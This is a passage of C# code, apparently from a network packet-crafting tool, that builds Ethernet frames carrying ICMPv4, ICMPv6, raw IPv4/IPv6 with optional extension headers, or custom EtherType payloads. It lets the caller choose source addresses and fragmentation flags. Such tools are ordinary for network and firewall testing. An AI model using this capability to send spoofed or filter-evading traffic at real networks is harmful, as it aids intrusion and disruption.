ICMPv4Packet icmpPacket = new ICMPv4Packet(new ByteArraySegment(new byte[32])); if (param.type != 0 && param.code != 0) { icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256) + (param.code)); } else if (param.type != 0) { icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256)); } else { icmpPacket.TypeCode = ICMPv4TypeCodes.EchoRequest; } IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP); if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; } ipPacket.PayloadPacket = icmpPacket; ipPacket.Checksum = ipPacket.CalculateIPChecksum(); ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4); ret.PayloadPacket = ipPacket; } else if (param.packetType == Param.PacketType.ICMPv6) { ICMPv6Packet icmpv6Packet = CreateICMPv6Packet(param); IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ipPacket.PayloadPacket = icmpv6Packet; ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6); ret.PayloadPacket = ipPacket; } else if (param.packetType == Param.PacketType.IP) { if (param.dIP.ToString().Contains(".")) { ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4); IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP); if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; } ipPacket.Protocol = param.IPProtocol; ipPacket.PayloadData = param.payload; ipPacket.UpdateCalculatedValues(); ret.PayloadPacket = ipPacket; ipPacket.UpdateIPChecksum(); } else { ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6); //if extension headers were not specified, just put the payload if (param.ExtentionHeader.Count == 0) { IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ipPacket.Protocol = param.IPProtocol; ipPacket.PayloadData = param.payload; ipPacket.PayloadLength = (ushort)param.payload.Length; ipPacket.UpdateCalculatedValues(); ret.PayloadPacket = ipPacket; } else { ret = PacketFactory.CreateEHPacket(param, (EthernetPacket)ret); } ret.UpdateCalculatedValues(); } } else if (param.packetType == Param.PacketType.EtherType) { ret = new EthernetPacket(param.sMAC, param.dMAC, param.EtherTypeProtocol); byte[] etherBuffer = (new byte[64]); var payload = new byte[etherBuffer.Length + (param.payload).Length]; etherBuffer.CopyTo(payload, 0); (param.payload).CopyTo(payload, etherBuffer.Length); ret.PayloadData = payload; ret.UpdateCalculatedValues(); } return ret; }